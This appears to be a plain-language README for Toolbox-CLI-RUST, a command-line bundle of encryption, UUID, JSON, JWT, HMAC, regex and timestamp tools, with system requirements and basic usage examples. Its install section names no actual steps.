๐Ÿ“ What is Toolbox-CLI-RUST?

Toolbox-CLI-RUST is a collection of useful programs you can run from the command line on your computer. It combines many tools into one place. These tools help with tasks like security checks, encrypting messages, working with text, and managing data.

Even though it is designed with developers in mind, anyone can use it. You do not need to know programming to run the tools. Everything works in the terminal or command prompt on your computer.

๐Ÿ’ป What can you do with Toolbox-CLI-RUST?

Here are some examples of what Toolbox-CLI-RUST offers:

  • Encrypt and decrypt messages with AES encryption.
  • Generate unique codes and IDs using UUID generation.
  • Work with JSON files for data management.
  • Create and verify JWT tokens for security.
  • Use HMAC codes for message authentication.
  • Search and match text patterns using regular expressions.
  • Convert and track timestamps in Unix format.
  • Run productivity tools to simplify your daily tasks.

All these tools are accessible through a single program that you run on your computer.

๐Ÿ“ฅ Download & Install

To get Toolbox-CLI-RUST on your computer, follow these steps:

๐Ÿ–ฅ๏ธ System Requirements

Toolbox-CLI-RUST works on many computers. Here are the main requirements:

  • Operating Systems supported:

    • Windows 10 or later
    • macOS Mojave or later
    • Most Linux distributions with standard terminal access
  • Processor: Any modern Intel or AMD processor or equivalent.

  • Memory: At least 512 MB of RAM.

  • Disk space: About 50 MB free space to install and run.

๐Ÿš€ How to Use Toolbox-CLI-RUST

After you install the program, open a terminal or command prompt window. You can open the terminal in different ways depending on your system:

  • Windows: Search for โ€œCommand Promptโ€ or โ€œPowerShellโ€ in the Start menu.

  • Mac: Open โ€œTerminalโ€ from Applications > Utilities.

  • Linux: Look for โ€œTerminalโ€ in your applications menu.

Once open, type the following command and press Enter:

toolbox --help

This command shows all the tools you can use and how to use them. You will see a list with descriptions for each tool.

Running a simple tool

For example, to create a new universally unique identifier (UUID), type:

toolbox uuid

The program will give you a random UUID. This is a unique number that can identify something in your projects or files.

Encrypting a message

To encrypt text with AES encryption, you might use:

toolbox aes encrypt your-message-here your-password

Replace your-message-here with the text you want to encrypt and your-password with a word you choose. The program will return an encrypted message you can safely send or store.

Decrypting a message

If you receive an encrypted message, decrypt it by running:

toolbox aes decrypt encrypted-text your-password

Replace encrypted-text with the code you received and your-password with the same password used before.

Each tool has its own short guide shown with:

toolbox toolname --help

For example, toolbox jwt --help shows how to create and verify JWT tokens.
